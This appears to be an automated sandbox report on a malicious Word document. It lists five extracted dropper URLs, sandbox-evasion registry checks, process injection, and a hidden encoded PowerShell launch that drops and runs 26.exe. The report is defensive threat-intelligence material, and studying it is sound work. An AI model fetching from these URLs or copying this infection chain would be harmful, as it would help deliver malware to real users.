Analysis
Max time kernel: 25s
Resource: win10v191014
Submitted: 16-12-2019 19:42
General
Target: ddb132a2a482908f35a670ba81bd36da2e7972ac5afdc4aa61607088769774b5.doc
Sample: 191216-3l65tdvfsn
SHA256: ddb132a2a482908f35a670ba81bd36da2e7972ac5afdc4aa61607088769774b5
Score: 8/10
Malware Config
Extracted
Language: ps1
Source URLs (all of type exe.dropper):
- http://www.simple-it.org/wp-content/5ytq5ejxlc-r2pqs5bzt6-509383840/
- https://www.uaeneeds.com/wp-admin/iPaIUkhj/
- http://oki-dental.com/sys/upydu-4nmmykhbf-292/
- http://blog.itsaboutnature.net/confabulate-grainy/tad0m4bjt-li6lr-5546823/
- http://kellis.store/wp-content/sLTProK/
Signatures

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  4984  WINWORD.EXE
  3960  26.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4724  Powershell.exe

Executes dropped EXE (1 IoC)
  pid   Process
  3960  26.exe

Checks system information in the registry (2 TTPs, 2 IoCs)
System information is often read in order to detect sandboxing environments.
  description        ioc
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4984  WINWORD.EXE

Suspicious use of FindShellTrayWindow (1 IoC)
  pid   Process
  4984  WINWORD.EXE

Suspicious use of WriteProcessMemory (2 IoCs)
  description                       pid   Process           procid_target
  PID 4056 wrote to memory of 4588  4056  SppExtComObj.exe  76
  PID 4724 wrote to memory of 3960  4724  Powershell.exe    80

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  4724  Powershell.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 4984)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ddb132a2a482908f35a670ba81bd36da2e7972ac5afdc4aa61607088769774b5.doc" /o ""
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\SppExtComObj.exe (PID 4056)
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\SLUI.exe (PID 4588)
    Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (PID 4724)
  Command line: Powershell -w hidden -en <encoded command omitted>
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses

  C:\Users\Admin\26.exe (PID 3960)
    Command line: "C:\Users\Admin\26.exe"
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE